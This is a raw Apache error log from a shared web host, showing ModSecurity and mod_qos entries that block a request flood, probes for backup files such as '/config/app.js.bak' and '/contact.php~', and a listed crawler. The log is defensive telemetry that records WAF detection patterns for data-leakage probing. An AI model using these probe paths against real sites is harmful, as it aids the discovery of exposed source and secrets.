[Tue May 26 19:55:03.412300 2026] [security2:error] [pid 93868:tid 94308] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OQAAAAcE"]
[Tue May 26 19:55:03.416967 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPmDRMqfxdEDkoszV0QAAABs"]
[Tue May 26 19:55:03.426449 2026] [security2:error] [pid 86490:tid 86685] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/app.js.bak"] [unique_id "ahWtP1ZMwN0DpLVWo6LKmAAAAMY"]
[Tue May 26 19:55:03.432063 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVwgAAAAk"]
[Tue May 26 19:55:03.437248 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25ORQAAAcs"]
[Tue May 26 19:55:03.439885 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVugAAAF4"]
[Tue May 26 19:55:03.466221 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OQQAAAe4"]
[Tue May 26 19:55:03.466686 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPmDRMqfxdEDkoszV1wAAAAI"]
[Tue May 26 19:55:03.472074 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVvwAAAEY"]
[Tue May 26 19:55:03.611977 2026] [security2:error] [pid 93576:tid 93768] [client 123.20.75.189:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszV_gAAADg"]
[Tue May 26 19:55:03.819988 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtP2DRMqfxdEDkoszWNQAAAA0
[Tue May 26 19:55:03.820473 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtP2DRMqfxdEDkoszWNgAAAG8
[Tue May 26 19:55:03.820828 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtP2DRMqfxdEDkoszWMwAAAEo
[Tue May 26 19:55:03.821029 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtP2DRMqfxdEDkoszWNAAAAAA
[Tue May 26 19:55:03.821325 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtP2DRMqfxdEDkoszWOAAAADk
[Tue May 26 19:55:03.821642 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtP2DRMqfxdEDkoszWOQAAADI
[Tue May 26 19:55:03.828714 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtP2DRMqfxdEDkoszWQAAAADE
[Tue May 26 19:55:03.828738 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtP2DRMqfxdEDkoszWPwAAAEU
[Tue May 26 19:55:03.831067 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtP2DRMqfxdEDkoszWQwAAADo
[Tue May 26 19:55:04.077654 2026] [security2:error] [pid 86490:tid 86701] [client 185.177.72.53:56282] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/contact.php~"] [unique_id "ahWtQFZMwN0DpLVWo6LK1wAAANY"]
[Tue May 26 19:55:04.146603 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:56898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQFZMwN0DpLVWo6LK2QAAAKc
[Tue May 26 19:55:04.146605 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtQGDRMqfxdEDkoszWRwAAAAk
[Tue May 26 19:55:04.148816 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:60074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQFZMwN0DpLVWo6LK2gAAALg
[Tue May 26 19:55:04.149194 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:60066] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQFZMwN0DpLVWo6LK2wAAAPY
[Tue May 26 19:55:04.149712 2026] [qos:error] [pid 93868:tid 94352] [client 45.148.10.120:43364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25OiwAAAe0
[Tue May 26 19:55:04.150261 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:60008] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQFZMwN0DpLVWo6LK3QAAAOI
[Tue May 26 19:55:04.151788 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:60166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQFZMwN0DpLVWo6LK3gAAAJk
[Tue May 26 19:55:04.152952 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25OjAAAAdE
[Tue May 26 19:55:04.153402 2026] [qos:error] [pid 93868:tid 94351] [client 45.148.10.120:60112] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25OjQAAAew
[Tue May 26 19:55:04.153409 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:60050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25OjgAAAZQ
[Tue May 26 19:55:04.264124 2026] [qos:error] [pid 93576:tid 93787] [client 43.173.179.80:36992] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=43.173.179.80, id=ahWtQGDRMqfxdEDkoszWSgAAAEs
[Tue May 26 19:55:04.281841 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OYgAAAZ8"]
[Tue May 26 19:55:04.286480 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OVwAAAaI"]
[Tue May 26 19:55:04.292317 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPmDRMqfxdEDkoszV0gAAABc"]
[Tue May 26 19:55:04.308733 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OYAAAAe8"]
[Tue May 26 19:55:04.310738 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPmDRMqfxdEDkoszV4AAAABY"]
[Tue May 26 19:55:04.314579 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OVQAAAaU"]
[Tue May 26 19:55:04.314921 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OYwAAAes"]
[Tue May 26 19:55:04.314981 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OXQAAAcA"]
[Tue May 26 19:55:04.322975 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OZQAAAa0"]
[Tue May 26 19:55:04.323299 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OYQAAAgM"]
[Tue May 26 19:55:04.328992 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OXAAAAfM"]
[Tue May 26 19:55:04.329791 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OWgAAAZw"]
[Tue May 26 19:55:04.330079 2026] [security2:error] [pid 93868:tid 94287] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OaAAAAaw"]
[Tue May 26 19:55:04.342505 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPWDRMqfxdEDkoszVxAAAAG4"]
[Tue May 26 19:55:04.343072 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPmDRMqfxdEDkoszV4QAAAFg"]
[Tue May 26 19:55:04.353890 2026] [security2:error] [pid 93868:tid 94385] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OXgAAAg4"]
[Tue May 26 19:55:04.357048 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OWAAAAas"]
[Tue May 26 19:55:04.359648 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPkqK9k_ZUB2Vp25OZgAAAbA"]
[Tue May 26 19:55:04.372468 2026] [security2:error] [pid 93576:tid 93795] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPmDRMqfxdEDkoszV1gAAAFM"]
[Tue May 26 19:55:04.379981 2026] [security2:error] [pid 86490:tid 86663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP1ZMwN0DpLVWo6LKvwAAALA"]
[Tue May 26 19:55:04.394347 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWBQAAAFQ"]
[Tue May 26 19:55:04.406491 2026] [security2:error] [pid 86490:tid 86672] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP1ZMwN0DpLVWo6LKoAAAALk"]
[Tue May 26 19:55:04.417786 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWKQAAAC0"]
[Tue May 26 19:55:04.423076 2026] [security2:error] [pid 86490:tid 86624] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP1ZMwN0DpLVWo6LKkwAAAIk"]
[Tue May 26 19:55:04.425844 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWLQAAABU"]
[Tue May 26 19:55:04.430670 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtPmDRMqfxdEDkoszV7QAAABI"]
[Tue May 26 19:55:04.435957 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWGQAAACA"]
[Tue May 26 19:55:04.441483 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWJAAAAFs"]
[Tue May 26 19:55:04.441741 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWHAAAAGQ"]
[Tue May 26 19:55:04.448182 2026] [security2:error] [pid 86490:tid 86738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP1ZMwN0DpLVWo6LKvQAAAPs"]
[Tue May 26 19:55:04.453311 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWKAAAAGc"]
[Tue May 26 19:55:04.457936 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtP2DRMqfxdEDkoszWGgAAAFA"]
[Tue May 26 19:55:04.924900 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:48936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25OygAAAdc
[Tue May 26 19:55:04.924915 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtQEqK9k_ZUB2Vp25OyQAAAaQ
[Tue May 26 19:55:04.925763 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtQEqK9k_ZUB2Vp25OywAAAe8
[Tue May 26 19:55:04.927133 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:49034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25OzgAAAd4
[Tue May 26 19:55:04.928916 2026] [qos:error] [pid 93868:tid 94369] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25O0AAAAf4
[Tue May 26 19:55:04.929068 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtQGDRMqfxdEDkoszWawAAAE4
[Tue May 26 19:55:04.930210 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:48954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25O0QAAAdA
[Tue May 26 19:55:04.933569 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtQGDRMqfxdEDkoszWbQAAABY
[Tue May 26 19:55:04.939369 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:49016] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25O0gAAAaA
[Tue May 26 19:55:04.954037 2026] [qos:error] [pid 93868:tid 94351] [client 45.148.10.120:49046] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQEqK9k_ZUB2Vp25O0wAAAew
[Tue May 26 19:55:05.007801 2026] [security2:error] [pid 93868:tid 94259] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtQEqK9k_ZUB2Vp25OpgAAAZA"]
[Tue May 26 19:55:05.066045 2026] [security2:error] [pid 93576:tid 93735] [client 85.208.96.201:27098] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/3/"] [unique_id "ahWtQWDRMqfxdEDkoszWdAAAABc"]
[Tue May 26 19:55:05.066180 2026] [security2:error] [pid 93576:tid 93735] [client 85.208.96.201:27098] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/3/"] [unique_id "ahWtQWDRMqfxdEDkoszWdAAAABc"]
[Tue May 26 19:55:05.073971 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:49012] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWdQAAAG4
[Tue May 26 19:55:05.075140 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:49004] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWdgAAAAo
[Tue May 26 19:55:05.077857 2026] [qos:error] [pid 93868:tid 94374] [client 45.148.10.120:49034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O2AAAAgM
[Tue May 26 19:55:05.079423 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:48936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O2QAAAa8
[Tue May 26 19:55:05.080212 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O2gAAAdw
[Tue May 26 19:55:05.081661 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:48990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQWDRMqfxdEDkoszWdwAAAFg
[Tue May 26 19:55:05.084164 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:48954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O2wAAAbo
[Tue May 26 19:55:05.091096 2026] [qos:error] [pid 93868:tid 94311] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtQUqK9k_ZUB2Vp25O3AAAAcQ
